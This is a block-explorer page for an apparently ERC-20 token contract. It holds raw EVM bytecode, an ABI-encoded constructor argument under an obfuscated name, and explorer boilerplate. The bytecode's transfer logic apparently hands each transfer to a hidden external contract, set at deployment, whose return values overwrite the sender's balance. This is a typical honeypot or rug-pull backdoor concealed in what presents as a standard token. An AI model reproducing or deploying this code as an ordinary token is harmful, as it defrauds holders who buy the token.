5050505050905090565b60006103ec338484610b32565b6001905092915050565b6000600754905090565b600061040d848484610cfd565b6104c084336104bb85604051806060016040528060288152602001611b3260289139600260008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461108d9092919063ffffffff16565b610b32565b600190509392505050565b6000600660009054906101000a900460ff1660ff16905090565b6000610580338461057b85600260003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546110f190919063ffffffff16565b610b32565b6001905092915050565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b3373ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610661576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161065890611695565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a360008060006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b600360009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b60606005805461077d90611831565b80601f01602080910402602001604051908101604052809291908181526020018280546107a990611831565b80156107f65780601f106107cb576101008083540402835291602001916107f6565b820191906000526020600020905b8154815290600101906020018083116107d957829003601f168201915b5050505050905090565b60006108b533846108b085604051806060016040528060258152602001611b5a60259139600260003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461108d9092919063ffffffff16565b610b32565b6001905092915050565b60006108cc338484610cfd565b6001905092915050565b6000600660009054906101000a900460ff1660ff16905090565b6000600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b3373ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610a05576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109fc90611695565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff161415610a75576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a6c90611615565b60405180910390fd5b8073ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a3806000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610ba2576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b99906116d5565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610c12576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c0990611635565b60405180910390fd5b80600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610cf091906116f5565b60405180910390a3505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610d6d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d64906116b5565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610ddd576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610dd4906115f5565b60405180910390fd5b60008080610e2c868686600160008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461114f565b9150915080600160008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555083600160008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020541015610ef6576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610eed90611675565b60405180910390fd5b610f4884600160008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461121190919063ffffffff16565b600160008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550610fdd82600160008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546110f190919063ffffffff16565b600160008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508473ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8660405161107d91906116f5565b60405180910390a3505050505050565b60008383111582906110d5576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016110cc91906115d3565b60405180910390fd5b50600083856110e49190611782565b9050809150509392505050565b6000808284611100919061172c565b905083811015611145576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161113c90611655565b60405180910390fd5b8091505092915050565b600080600660019054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663c31e7832878787876040518563ffffffff1660e01b81526004016111b39493929190611573565b6040805180830381600087803b1580156111cc57600080fd5b505af11580156111e0573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190611204919061139a565b9150915094509492505050565b600061125383836040518060400160405280601e81526020017f536166654d6174683a207375627472616374696f6e206f766572666c6f77000081525061108d565b905092915050565b60008135905061126a81611b03565b92915050565b60008135905061127f81611b1a565b92915050565b60008151905061129481611b1a565b92915050565b6000602082840312156112b0576112af6118c1565b5b60006112be8482850161125b565b91505092915050565b600080604083850312156112de576112dd6118c1565b5b60006112ec8582860161125b565b92505060206112fd8582860161125b565b9150509250929050565b6000806000606084860312156113205761131f6118c1565b5b600061132e8682870161125b565b935050602061133f8682870161125b565b925050604061135086828701611270565b9150509250925092565b60008060408385031215611371576113706118c1565b5b600061137f8582860161125b565b925050602061139085828601611270565b9150509250929050565b600080604083850312156113b1576113b06118c1565b5b60006113bf85828601611285565b92505060206113d085828601611285565b9150509250929050565b6113e3816117b6565b82525050565b6113f2816117c8565b82525050565b600061140382611710565b61140d818561171b565b935061141d8185602086016117fe565b611426816118c6565b840191505092915050565b600061143e60238361171b565b9150611449826118d7565b604082019050919050565b600061146160268361171b565b915061146c82611926565b604082019050919050565b600061148460228361171b565b915061148f82611975565b604082019050919050565b60006114a7601b8361171b565b91506114b2826119c4565b602082019050919050565b60006114ca60268361171b565b91506114d5826119ed565b604082019050919050565b60006114ed60208361171b565b91506114f882611a3c565b602082019050919050565b600061151060258361171b565b915061151b82611a65565b604082019050919050565b600061153360248361171b565b915061153e82611ab4565b604082019050919050565b611552816117f4565b82525050565b600060208201905061156d60008301846113da565b92915050565b600060808201905061158860008301876113da565b61159560208301866113da565b6115a26040830185611549565b6115af6060830184611549565b95945050505050565b60006020820190506115cd60008301846113e9565b92915050565b600060208201905081810360008301526115ed81846113f8565b905092915050565b6000602082019050818103600083015261160e81611431565b9050919050565b6000602082019050818103600083015261162e81611454565b9050919050565b6000602082019050818103600083015261164e81611477565b9050919050565b6000602082019050818103600083015261166e8161149a565b9050919050565b6000602082019050818103600083015261168e816114bd565b9050919050565b600060208201905081810360008301526116ae816114e0565b9050919050565b600060208201905081810360008301526116ce81611503565b9050919050565b600060208201905081810360008301526116ee81611526565b9050919050565b600060208201905061170a6000830184611549565b92915050565b600081519050919050565b600082825260208201905092915050565b6000611737826117f4565b9150611742836117f4565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0382111561177757611776611863565b5b828201905092915050565b600061178d826117f4565b9150611798836117f4565b9250828210156117ab576117aa611863565b5b828203905092915050565b60006117c1826117d4565b9050919050565b60008115159050919050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000819050919050565b60005b8381101561181c578082015181840152602081019050611801565b8381111561182b576000848401525b50505050565b6000600282049050600182168061184957607f821691505b6020821081141561185d5761185c611892565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600080fd5b6000601f19601f8301169050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b7f536166654d6174683a206164646974696f6e206f766572666c6f770000000000600082015250565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b611b0c816117b6565b8114611b1757600080fd5b50565b611b23816117f4565b8114611b2e57600080fd5b5056fe45524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e636545524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa2646970667358221220ad9f0bd87672b469a272605d1dabcd755fa0e7bc9388749d54387d52ff30e2ec64736f6c63430008060033
Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)
0000000000000000000000001e9fae8162c76209199057e111d3b92bd3394416
-----Decoded View---------------
Arg [0] : aUWbfJi (uint256): 174830743176758612949353227169103684555870127126
-----Encoded View---------------
1 Constructor Arguments found :
Arg [0] : 0000000000000000000000001e9fae8162c76209199057e111d3b92bd3394416
[ Download: CSV Export ]
[ Download: CSV Export ]
A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.